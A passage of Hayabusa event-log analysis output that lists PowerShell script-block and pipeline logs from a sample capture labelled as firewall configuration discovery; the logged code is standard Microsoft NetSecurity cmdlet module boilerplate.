[Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PerfectForwardSecrecyGroup}) $__cmdletization_queryBuilder.FilterByProperty('PfsGroupID', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleQMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.036 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log," 1.0.0.0 NetFirewallProfile ",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.051 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-Command): ""Get-Command"" ParameterBinding(Get-Command): name=""Module""; value=""Microsoft.PowerShell.Core"" ParameterBinding(Get-Command): name=""Name""; value=""Set-StrictMode""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.051 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.051 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Collections.Generic.Dictionary[string,string]""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.051 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.051 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 if ($(Microsoft.PowerShell.Core\Get-Command Set-StrictMode -Module Microsoft.PowerShell.Core)) { Microsoft.PowerShell.Core\Set-StrictMode -Off } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetFirewallProfile' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = 'Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter' $script:PrivateData = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.Dictionary[string,string]' Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallProfile { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('Profile')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('Name', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleInProfile', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleInProfile', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleInProfile', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallProfile.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallProfile' function Set-NetFirewallProfile { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('Profile')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${Enabled}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action] ${DefaultInboundAction}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action] ${DefaultOutboundAction}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${AllowInboundRules}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${AllowLocalFirewallRules}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${AllowLocalIPsecRules}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShe",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.051 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"ll.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${AllowUserApps}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${AllowUserPorts}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${AllowUnicastResponseToMulticast}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${NotifyOnListen}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${EnableStealthModeForIPsec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${LogFileName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint64] ${LogMaxSizeKilobytes}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${LogAllowed}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${LogBlocked}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${LogIgnored}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${DisabledInterfaceAliases}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('Name', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if 